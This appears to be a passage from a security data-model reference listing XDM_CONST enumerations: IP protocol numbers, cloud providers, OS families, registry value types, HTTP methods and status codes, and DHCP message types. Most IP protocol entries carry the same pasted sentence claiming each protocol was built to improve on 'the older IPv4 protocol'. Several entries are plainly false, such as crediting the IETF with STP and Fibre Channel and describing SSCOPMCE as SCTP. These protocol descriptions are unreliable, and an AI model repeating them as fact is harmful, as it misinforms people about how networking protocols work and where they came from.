88 XDM_CONST.IP_PROTOCOL_EIGRP The Enhanced Interior Gateway Routing Protocol (EIGRP) is a routing protocol used to send messages between computers in a distributed system. It was developed by Cisco Systems and was designed to be more reliable and efficient than the older
IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

89 XDM_CONST.IP_PROTOCOL_OSPFIGP The Open Shortest Path First Interior Gateway Protocol (OSPF IGP) is a routing protocol used to send messages between computers in a distributed system. It was developed by the OSPF Working Group and was designed to be more reliable and
efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

90 XDM_CONST.IP_PROTOCOL_SPRITE_RPC The Sprite Remote Procedure Call Protocol (Sprite RPC) is a protocol used to send messages between computers in a distributed system. It was developed by the University of California, Berkeley and was designed to be more reliable and efficient
than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

91 XDM_CONST.IP_PROTOCOL_LARP The Locus Address Resolution Protocol (LARP) is a protocol used to send messages between computers in a distributed system. It was developed by the Xerox Corporation and was designed to be more reliable and efficient than the older IPv4
protocol, which had become inadequate due to the explosive growth of the Internet.

92 XDM_CONST.IP_PROTOCOL_MTP The Multicast Transport Protocol (MTP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive
growth of the Internet.

93 XDM_CONST.IP_PROTOCOL_AX25 The AX.25 Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Amateur Radio Relation community and was designed to be more reliable and efficient than the older IPv4 protocol, which
had become inadequate due to the explosive growth of the Internet.

94 XDM_CONST.IP_PROTOCOL_IPIP The Internet Protocol over Internet Protocol (IPIP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

95 XDM_CONST.IP_PROTOCOL_MICP The Mobile Internetworking Control Protocol (MICP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to
the explosive growth of the Internet.

96 XDM_CONST.IP_PROTOCOL_SCC_SP The Semaphore Communications Security Protocol (SCC-SP) is a protocol used to send secure messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become
inadequate due to the explosive growth of the Internet.

97 XDM_CONST.IP_PROTOCOL_ETHERIP The Ethernet over Internet Protocol (Ethernet/IP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

98 XDM_CONST.IP_PROTOCOL_ENCAP The Encapsulation Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of
the Internet.

100 XDM_CONST.IP_PROTOCOL_GMTP The GMTP Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol,which had become inadequate due to the explosive growth of the
Internet.

101 XDM_CONST.IP_PROTOCOL_IFMP The Ipsilon Flow Management Protocol (IFMP) is a protocol used to send messages between computers in a distributed system. It was developed by the Ipsilon Networks company and was designed to be more reliable and efficient than the older IPv4
protocol, which had become inadequate due to the explosive growth of the Internet.

102 XDM_CONST.IP_PROTOCOL_PNNI The Private Network-to-Network Interface (PNNI) is a protocol used to send messages between computers in a distributed system. It was developed by the ATM Forum and was designed to be more reliable and efficient than the older IPv4 protocol,
which had become inadequate due to the explosive growth of the Internet.

103 XDM_CONST.IP_PROTOCOL_PIM The Protocol Independent Multicast (PIM) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

104 XDM_CONST.IP_PROTOCOL_ARIS The Advanced Reliable Internet Service Protocol (ARIS) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due
to the explosive growth of the Internet.

105 XDM_CONST.IP_PROTOCOL_SCPS The Space Communications Protocol Standards (SCPS) is a protocol used to send messages between computers in a distributed system. It was developed by the Consultative Committee for Space Data Systems (CCSDS) and was designed to be
more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
Original Mapped Description

106 XDM_CONST.IP_PROTOCOL_QNX The QNX Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the QNX Software Systems company and was designed to be more reliable and efficient than the older IPv4 protocol, which had
become inadequate due to the explosive growth of the Internet.

107 XDM_CONST.IP_PROTOCOL_AN The A/N Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

108 XDM_CONST.IP_PROTOCOL_IPCOMP The Internet Protocol Compression Protocol (IPComp) is a protocol used to compress Internet Protocol (IP) packets in order to reduce the amount of data transmitted over a network. It was designed to be more efficient than the older IPv4 protocol,
which had become inadequate due to the explosive growth of the Internet.

109 XDM_CONST.IP_PROTOCOL_SNP The Sitara Networks Protocol (SNP) is a protocol used to send messages between computers in a distributed system. It was developed by the Sitara Networks company and was designed to be more reliable and efficient than the older IPv4 protocol,
which had become inadequate due to the explosive growth of the Internet.

110 XDM_CONST.IP_PROTOCOL_COMPAQ_PEER The Compaq Peer Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Compaq company and was designed to be more reliable and efficient than the older IPv4 protocol, which had
become inadequate due to the explosive growth of the Internet.

111 XDM_CONST.IP_PROTOCOL_IPX_IN_IP The Internetwork Packet Exchange over Internet Protocol (IPX/IP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become
inadequate due to the explosive growth of the Internet.

112 XDM_CONST.IP_PROTOCOL_VRRP The Virtual Router Redundancy Protocol (VRRP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

113 XDM_CONST.IP_PROTOCOL_PGM The Pragmatic General Multicast (PGM) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

115 XDM_CONST.IP_PROTOCOL_L2TP The Layer 2 Tunneling Protocol (L2TP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive
growth of the Internet.

116 XDM_CONST.IP_PROTOCOL_DDX The D-II Data Exchange (DDX) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

117 XDM_CONST.IP_PROTOCOL_IATP The Interactive Agent Transfer Protocol (IATP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

118 XDM_CONST.IP_PROTOCOL_STP The Spanning Tree Protocol (STP) is a network protocol that is used to ensure that there are no loops in a network. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4
protocol, which had become inadequate due to the explosive growth of the Internet.

119 XDM_CONST.IP_PROTOCOL_SRP The SpectraLink Radio Protocol (SRP) is a protocol used to send messages between computers in a distributed system. It was developed by the SpectraLink Corporation and was designed to be more reliable and efficient than the older IPv4 protocol,
which had become inadequate due to the explosive growth of the Internet.

120 XDM_CONST.IP_PROTOCOL_UTI The Universal Transport Interface (UTI) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

121 XDM_CONST.IP_PROTOCOL_SMP The Simple Message Protocol (SMP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive
growth of the Internet.

122 XDM_CONST.IP_PROTOCOL_SM The Simple Multicast Protocol (SM) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive
growth of the Internet.

123 XDM_CONST.IP_PROTOCOL_PTP The Performance Transparency Protocol (PTP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

124 XDM_CONST.IP_PROTOCOL_ISIS The Intermediate System to Intermediate System (ISIS) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the International Organization for Standardization (ISO) and was designed to be
more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

125 XDM_CONST.IP_PROTOCOL_FIRE FIRE is a protocol for transporting data between a pair of hosts, with a focus on low latency.

126 XDM_CONST.IP_PROTOCOL_CRTP The Combat Radio Transport Protocol (CRTP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than
the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

127 XDM_CONST.IP_PROTOCOL_CRUDP The Combat Radio User Datagram Protocol (CRUDP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient
than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

128 XDM_CONST.IP_PROTOCOL_SSCOPMCE The Stream Control Transmission Protocol (SCTP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient
than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

129 XDM_CONST.IP_PROTOCOL_IPLT The IP Layer Transport Protocol (IPLT) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older
IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

130 XDM_CONST.IP_PROTOCOL_SPS The Secure Packet Shield (SPS) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the
explosive growth of the Internet.

131 XDM_CONST.IP_PROTOCOL_PIPE PIPE is a protocol used to provide in-kernel messaging between system processes.

132 XDM_CONST.IP_PROTOCOL_SCTP The Stream Control Transmission Protocol (SCTP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient
than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

133 XDM_CONST.IP_PROTOCOL_FC The Fibre Channel Protocol (FCP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4
protocol, which had become inadequate due to the explosive growth of the Internet.

134 XDM_CONST.IP_PROTOCOL_RSVP_E2E_IGNORE The Resource ReSerVation Protocol (RSVP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the
older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

135 XDM_CONST.IP_PROTOCOL_MOBILITY The Mobility Header (MH) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older
IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

136 XDM_CONST.IP_PROTOCOL_UDPLITE The User Datagram Protocol Lite (UDPLite) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the
older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

137 XDM_CONST.IP_PROTOCOL_MPLS_IN_IP Multiprotocol Label Switching (MPLS) is a mechanism used to speed up and shape traffic flows in a network. MPLS in IP is a way to encapsulate MPLS packets inside IP packets for transport across an IP network.

138 XDM_CONST.IP_PROTOCOL_MANET The Mobile Ad-hoc NETwork (MANET) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than
the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
 Original Mapped Description

139 XDM_CONST.IP_PROTOCOL_HIP The Host Identity Protocol (HIP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4
protocol, which had become inadequate due to the explosive growth of the Internet.

140 XDM_CONST.IP_PROTOCOL_SHIM6 The Site Multihoming by IPv6 Intermediation (Shim6) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and
efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

141 XDM_CONST.IP_PROTOCOL_WESP The Wrapped Encapsulating Security Payload (WESP) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable
and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

142 XDM_CONST.IP_PROTOCOL_ROHC The Robust Header Compression (ROHC) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient
than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

255 XDM_CONST.IP_PROTOCOL_RESERVED Reserved for future use.

3.6 | XDM_CONST.CLOUD_PROVIDER
A cloud provider.

Original Mapped Description

AWS XDM_CONST.CLOUD_PROVIDER_AWS

GCP XDM_CONST.CLOUD_PROVIDER_GCP

AZURE XDM_CONST.CLOUD_PROVIDER_AZURE

ALIBABA XDM_CONST.CLOUD_PROVIDER_ALIBABA

ON_PREM XDM_CONST.CLOUD_PROVIDER_ON_PREM

3.7 | XDM_CONST.OS_FAMILY
An operating system.

Original Mapped Description

WINDOWS XDM_CONST.OS_FAMILY_WINDOWS A popular operating system developed by Microsoft that runs on personal computers and servers.

MACOS XDM_CONST.OS_FAMILY_MACOS The operating system that runs on Apple's Mac computers.

LINUX XDM_CONST.OS_FAMILY_LINUX A free and open-source operating system that runs on a wide range of devices, including personal computers, servers, and embedded systems.

ANDROID XDM_CONST.OS_FAMILY_ANDROID A mobile operating system developed by Google that is based on the Linux kernel. It is primarily used on smartphones and tablets.

IOS XDM_CONST.OS_FAMILY_IOS A mobile operating system developed by Apple that runs on iPhones and iPads.

UBUNTU XDM_CONST.OS_FAMILY_UBUNTU A free and open-source operating system based on the Linux kernel. It is popular among users who prefer a user-friendly interface and a wide range of software options.

DEBIAN XDM_CONST.OS_FAMILY_DEBIAN A free and open-source operating system based on the Linux kernel. It is known for its stability and large repository of software packages.

FEDORA XDM_CONST.OS_FAMILY_FEDORA A free and open-source operating system based on the Linux kernel. It is known for its focus on cutting-edge technologies and a commitment to free software.

CENTOS XDM_CONST.OS_FAMILY_CENTOS A free and open-source operating system based on the Linux kernel. It is often used as a base for other operating systems and is known for its stability and long-term support.

CHROMEOS XDM_CONST.OS_FAMILY_CHROMEOS A lightweight operating system developed by Google that is based on the Linux kernel. It is primarily used on Chromebooks and other devices with limited hardware resources.

SOLARIS XDM_CONST.OS_FAMILY_SOLARIS A proprietary operating system developed by Oracle that is based on the Unix operating system. It is often used on servers and other high-end systems.

SCADA XDM_CONST.OS_FAMILY_SCADA A type of industrial control system that is used to monitor and control large-scale industrial processes, such as power generation, oil and gas production, and water treatment.

3.8 | XDM_CONST.AGENT_TYPE
An agent type.

Original Mapped Description

REGULAR XDM_CONST.AGENT_TYPE_REGULAR

COLLECTOR XDM_CONST.AGENT_TYPE_COLLECTOR

VDI XDM_CONST.AGENT_TYPE_VDI

CLOUD XDM_CONST.AGENT_TYPE_CLOUD

3.9 | XDM_CONST.SIGNATURE_STATUS
A signature status.

Original Mapped Description

UNSIGNED XDM_CONST.SIGNATURE_STATUS_UNSIGNED
 Original Mapped Description

SIGNED_INVALID XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID

SIGNED_VERIFIED XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED

STATUS_UNKNOWN XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

3.10 | XDM_CONST.REGISTRY_VALUE_TYPE
Registry value type. See https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types.

Original Mapped Description

REG_BINARY XDM_CONST.REGISTRY_VALUE_TYPE_REG_BINARY Binary data in any form.

REG_DWORD XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD A 32-bit number.

REG_DWORD_LITTLE_ENDIAN XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_LITTLE_ENDIAN A 32-bit number in little-endian format. Windows is designed to run on little-endian computer architectures. Therefore, this value is defined as REG_DWORD in the Windows header files.

REG_DWORD_BIG_ENDIAN XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_BIG_ENDIAN A 32-bit number in big-endian format. Some UNIX systems support big-endian architectures.

REG_EXPAND_SZ XDM_CONST.REGISTRY_VALUE_TYPE_REG_EXPAND_SZ A null-terminated string that contains unexpanded references to environment variables (for example, "%PATH%"). It will be a Unicode or ANSI string depending on whether you use the Unicode or ANSI
functions. To expand the environment variable references, use the ExpandEnvironmentStrings function.

REG_LINK XDM_CONST.REGISTRY_VALUE_TYPE_REG_LINK A null-terminated Unicode string that contains the target path of a symbolic link that was created by calling the RegCreateKeyEx function with REG_OPTION_CREATE_LINK.

REG_MULTI_SZ XDM_CONST.REGISTRY_VALUE_TYPE_REG_MULTI_SZ A sequence of null-terminated strings, terminated by an empty string (\0). The following is an example: String1\0String2\0String3\0LastString\0\0 The first \0 terminates the first string, the second to the
last \0 terminates the last string, and the final \0 terminates the sequence. Note that the final terminator must be factored into the length of the string.

REG_NONE XDM_CONST.REGISTRY_VALUE_TYPE_REG_NONE No defined value type.

REG_QWORD XDM_CONST.REGISTRY_VALUE_TYPE_REG_QWORD A 64-bit number.

REG_QWORD_LITTLE_ENDIAN XDM_CONST.REGISTRY_VALUE_TYPE_REG_QWORD_LITTLE_ENDIAN A 64-bit number in little-endian format. Windows is designed to run on little-endian computer architectures. Therefore, this value is defined as REG_QWORD in the Windows header files.

REG_SZ XDM_CONST.REGISTRY_VALUE_TYPE_REG_SZ A null-terminated string. This will be either a Unicode or an ANSI string, depending on whether you use the Unicode or ANSI functions.

3.11 | XDM_CONST.HTTP_METHOD
The HTTP method. See https://www.iana.org/assignments/http-methods/http-methods.xhtml

Original Mapped Description

ACL XDM_CONST.HTTP_METHOD_ACL RFC3744, Section 8.1

BASELINE_CONTROL XDM_CONST.HTTP_METHOD_BASELINE_CONTROL RFC3253, Section 12.6

BIND XDM_CONST.HTTP_METHOD_BIND RFC5842, Section 4

CHECKIN XDM_CONST.HTTP_METHOD_CHECKIN RFC3253, Section 4.4, Section 9.4

CHECKOUT XDM_CONST.HTTP_METHOD_CHECKOUT RFC3253, Section 4.3, Section 8.8

CONNECT XDM_CONST.HTTP_METHOD_CONNECT RFC-ietf-httpbis-semantics, Section 9.3.6

COPY XDM_CONST.HTTP_METHOD_COPY RFC4918, Section 9.8

DELETE XDM_CONST.HTTP_METHOD_DELETE RFC-ietf-httpbis-semantics, Section 9.3.5

GET XDM_CONST.HTTP_METHOD_GET RFC-ietf-httpbis-semantics, Section 9.3.1

HEAD XDM_CONST.HTTP_METHOD_HEAD RFC-ietf-httpbis-semantics, Section 9.3.2

LABEL XDM_CONST.HTTP_METHOD_LABEL RFC3253, Section 8.2

LINK XDM_CONST.HTTP_METHOD_LINK RFC2068, Section 19.6.1.2

LOCK XDM_CONST.HTTP_METHOD_LOCK RFC4918, Section 9.10

MERGE XDM_CONST.HTTP_METHOD_MERGE RFC3253, Section 11.2

MKACTIVITY XDM_CONST.HTTP_METHOD_MKACTIVITY RFC3253, Section 13.5

MKCALENDAR XDM_CONST.HTTP_METHOD_MKCALENDAR RFC4791, Section 5.3.1, RFC8144, Section 2.3

MKCOL XDM_CONST.HTTP_METHOD_MKCOL RFC4918, Section 9.3, RFC5689, Section 3, RFC8144, Section 2.3

MKREDIRECTREF XDM_CONST.HTTP_METHOD_MKREDIRECTREF RFC4437, Section 6

MKWORKSPACE XDM_CONST.HTTP_METHOD_MKWORKSPACE RFC3253, Section 6.3

MOVE XDM_CONST.HTTP_METHOD_MOVE RFC4918, Section 9.9

 Original Mapped Description

OPTIONS XDM_CONST.HTTP_METHOD_OPTIONS RFC-ietf-httpbis-semantics, Section 9.3.7

ORDERPATCH XDM_CONST.HTTP_METHOD_ORDERPATCH RFC3648, Section 7

PATCH XDM_CONST.HTTP_METHOD_PATCH RFC5789, Section 2

POST XDM_CONST.HTTP_METHOD_POST RFC-ietf-httpbis-semantics, Section 9.3.3

PRI XDM_CONST.HTTP_METHOD_PRI RFC-ietf-httpbis-http2bis-07, Section 3.4

PROPFIND XDM_CONST.HTTP_METHOD_PROPFIND RFC4918, Section 9.1, RFC8144, Section 2.1

PROPPATCH XDM_CONST.HTTP_METHOD_PROPPATCH RFC4918, Section 9.2, RFC8144, Section 2.2

PUT XDM_CONST.HTTP_METHOD_PUT RFC-ietf-httpbis-semantics, Section 9.3.4

REBIND XDM_CONST.HTTP_METHOD_REBIND RFC5842, Section 6

REPORT XDM_CONST.HTTP_METHOD_REPORT RFC3253, Section 3.6, RFC8144, Section 2.1

SEARCH XDM_CONST.HTTP_METHOD_SEARCH RFC5323, Section 2

TRACE XDM_CONST.HTTP_METHOD_TRACE RFC-ietf-httpbis-semantics, Section 9.3.8

UNBIND XDM_CONST.HTTP_METHOD_UNBIND RFC5842, Section 5

UNCHECKOUT XDM_CONST.HTTP_METHOD_UNCHECKOUT RFC3253, Section 4.5

UNLINK XDM_CONST.HTTP_METHOD_UNLINK RFC2068, Section 19.6.1.3

UNLOCK XDM_CONST.HTTP_METHOD_UNLOCK RFC4918, Section 9.11

UPDATE XDM_CONST.HTTP_METHOD_UPDATE RFC3253, Section 7.1

UPDATEREDIRECTREF XDM_CONST.HTTP_METHOD_UPDATEREDIRECTREF RFC4437, Section 7

VERSION_CONTROL XDM_CONST.HTTP_METHOD_VERSION_CONTROL RFC3253, Section 3.5

3.12 | XDM_CONST.HTTP_RSP_CODE
The HTTP response code.

Original Mapped Description

100 XDM_CONST.HTTP_RSP_CODE_CONTINUE RFC-ietf-httpbis-semantics, Section 15.2.1

101 XDM_CONST.HTTP_RSP_CODE_SWITCHING_PROTOCOLS RFC-ietf-httpbis-semantics, Section 15.2.2

102 XDM_CONST.HTTP_RSP_CODE_PROCESSING RFC2518

103 XDM_CONST.HTTP_RSP_CODE_EARLY_HINTS RFC8297

200 XDM_CONST.HTTP_RSP_CODE_OK RFC-ietf-httpbis-semantics, Section 15.3.1

201 XDM_CONST.HTTP_RSP_CODE_CREATED RFC-ietf-httpbis-semantics, Section 15.3.2

202 XDM_CONST.HTTP_RSP_CODE_ACCEPTED RFC-ietf-httpbis-semantics, Section 15.3.3

203 XDM_CONST.HTTP_RSP_CODE_NON__AUTHORITATIVE_INFORMATION RFC-ietf-httpbis-semantics, Section 15.3.4

204 XDM_CONST.HTTP_RSP_CODE_NO_CONTENT RFC-ietf-httpbis-semantics, Section 15.3.5

205 XDM_CONST.HTTP_RSP_CODE_RESET_CONTENT RFC-ietf-httpbis-semantics, Section 15.3.6

206 XDM_CONST.HTTP_RSP_CODE_PARTIAL_CONTENT RFC-ietf-httpbis-semantics, Section 15.3.7

207 XDM_CONST.HTTP_RSP_CODE_MULTI__STATUS RFC4918

208 XDM_CONST.HTTP_RSP_CODE_ALREADY_REPORTED RFC5842

226 XDM_CONST.HTTP_RSP_CODE_IM_USED RFC3229

300 XDM_CONST.HTTP_RSP_CODE_MULTIPLE_CHOICES RFC-ietf-httpbis-semantics, Section 15.4.1

301 XDM_CONST.HTTP_RSP_CODE_MOVED_PERMANENTLY RFC-ietf-httpbis-semantics, Section 15.4.2

302 XDM_CONST.HTTP_RSP_CODE_FOUND RFC-ietf-httpbis-semantics, Section 15.4.3

303 XDM_CONST.HTTP_RSP_CODE_SEE_OTHER RFC-ietf-httpbis-semantics, Section 15.4.4

304 XDM_CONST.HTTP_RSP_CODE_NOT_MODIFIED RFC-ietf-httpbis-semantics, Section 15.4.5

Original Mapped Description

305 XDM_CONST.HTTP_RSP_CODE_USE_PROXY RFC-ietf-httpbis-semantics, Section 15.4.6

307 XDM_CONST.HTTP_RSP_CODE_TEMPORARY_REDIRECT RFC-ietf-httpbis-semantics, Section 15.4.8

308 XDM_CONST.HTTP_RSP_CODE_PERMANENT_REDIRECT RFC-ietf-httpbis-semantics, Section 15.4.9

400 XDM_CONST.HTTP_RSP_CODE_BAD_REQUEST RFC-ietf-httpbis-semantics, Section 15.5.1

401 XDM_CONST.HTTP_RSP_CODE_UNAUTHORIZED RFC-ietf-httpbis-semantics, Section 15.5.2

402 XDM_CONST.HTTP_RSP_CODE_PAYMENT_REQUIRED RFC-ietf-httpbis-semantics, Section 15.5.3

403 XDM_CONST.HTTP_RSP_CODE_FORBIDDEN RFC-ietf-httpbis-semantics, Section 15.5.4

404 XDM_CONST.HTTP_RSP_CODE_NOT_FOUND RFC-ietf-httpbis-semantics, Section 15.5.5

405 XDM_CONST.HTTP_RSP_CODE_METHOD_NOT_ALLOWED RFC-ietf-httpbis-semantics, Section 15.5.6

406 XDM_CONST.HTTP_RSP_CODE_NOT_ACCEPTABLE RFC-ietf-httpbis-semantics, Section 15.5.7

407 XDM_CONST.HTTP_RSP_CODE_PROXY_AUTHENTICATION_REQUIRED RFC-ietf-httpbis-semantics, Section 15.5.8

408 XDM_CONST.HTTP_RSP_CODE_REQUEST_TIMEOUT RFC-ietf-httpbis-semantics, Section 15.5.9

409 XDM_CONST.HTTP_RSP_CODE_CONFLICT RFC-ietf-httpbis-semantics, Section 15.5.10

410 XDM_CONST.HTTP_RSP_CODE_GONE RFC-ietf-httpbis-semantics, Section 15.5.11

411 XDM_CONST.HTTP_RSP_CODE_LENGTH_REQUIRED RFC-ietf-httpbis-semantics, Section 15.5.12

412 XDM_CONST.HTTP_RSP_CODE_PRECONDITION_FAILED RFC-ietf-httpbis-semantics, Section 15.5.13

413 XDM_CONST.HTTP_RSP_CODE_CONTENT_TOO_LARGE RFC-ietf-httpbis-semantics, Section 15.5.14

414 XDM_CONST.HTTP_RSP_CODE_URI_TOO_LONG RFC-ietf-httpbis-semantics, Section 15.5.15

415 XDM_CONST.HTTP_RSP_CODE_UNSUPPORTED_MEDIA_TYPE RFC-ietf-httpbis-semantics, Section 15.5.16

416 XDM_CONST.HTTP_RSP_CODE_RANGE_NOT_SATISFIABLE RFC-ietf-httpbis-semantics, Section 15.5.17

417 XDM_CONST.HTTP_RSP_CODE_EXPECTATION_FAILED RFC-ietf-httpbis-semantics, Section 15.5.18

421 XDM_CONST.HTTP_RSP_CODE_MISDIRECTED_REQUEST RFC-ietf-httpbis-semantics, Section 15.5.20

422 XDM_CONST.HTTP_RSP_CODE_UNPROCESSABLE_CONTENT RFC-ietf-httpbis-semantics, Section 15.5.21

423 XDM_CONST.HTTP_RSP_CODE_LOCKED RFC4918

424 XDM_CONST.HTTP_RSP_CODE_FAILED_DEPENDENCY RFC4918

425 XDM_CONST.HTTP_RSP_CODE_TOO_EARLY RFC8470

426 XDM_CONST.HTTP_RSP_CODE_UPGRADE_REQUIRED RFC-ietf-httpbis-semantics, Section 15.5.22

428 XDM_CONST.HTTP_RSP_CODE_PRECONDITION_REQUIRED RFC6585

429 XDM_CONST.HTTP_RSP_CODE_TOO_MANY_REQUESTS RFC6585

431 XDM_CONST.HTTP_RSP_CODE_REQUEST_HEADER_FIELDS_TOO_LARGE RFC6585

451 XDM_CONST.HTTP_RSP_CODE_UNAVAILABLE_FOR_LEGAL_REASONS RFC7725

500 XDM_CONST.HTTP_RSP_CODE_INTERNAL_SERVER_ERROR RFC-ietf-httpbis-semantics, Section 15.6.1

501 XDM_CONST.HTTP_RSP_CODE_NOT_IMPLEMENTED RFC-ietf-httpbis-semantics, Section 15.6.2

502 XDM_CONST.HTTP_RSP_CODE_BAD_GATEWAY RFC-ietf-httpbis-semantics, Section 15.6.3

503 XDM_CONST.HTTP_RSP_CODE_SERVICE_UNAVAILABLE RFC-ietf-httpbis-semantics, Section 15.6.4

504 XDM_CONST.HTTP_RSP_CODE_GATEWAY_TIMEOUT RFC-ietf-httpbis-semantics, Section 15.6.5

505 XDM_CONST.HTTP_RSP_CODE_HTTP_VERSION_NOT_SUPPORTED RFC-ietf-httpbis-semantics, Section 15.6.6

506 XDM_CONST.HTTP_RSP_CODE_VARIANT_ALSO_NEGOTIATES RFC2295

507 XDM_CONST.HTTP_RSP_CODE_INSUFFICIENT_STORAGE RFC4918

508 XDM_CONST.HTTP_RSP_CODE_LOOP_DETECTED RFC5842

511 XDM_CONST.HTTP_RSP_CODE_NETWORK_AUTHENTICATION_REQUIRED RFC6585

3.13 | XDM_CONST.DHCP_MESSAGE_TYPE
DHCP message type. See https://www.iana.org/assignments/bootp-dhcp-parameters/bootp-dhcp-parameters.xhtml#message-type-53.

Original Mapped Description

1 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPDISCOVER [RFC2132]

2 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPOFFER [RFC2132]

3 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPREQUEST [RFC2132]

4 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPDECLINE [RFC2132]

5 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPACK [RFC2132]

6 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPNAK [RFC2132]

7 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPRELEASE [RFC2132]

8 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPINFORM [RFC2132]

9 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPFORCERENEW [RFC3203]

10 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEQUERY [RFC4388]

11 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEUNASSIGNED [RFC4388]

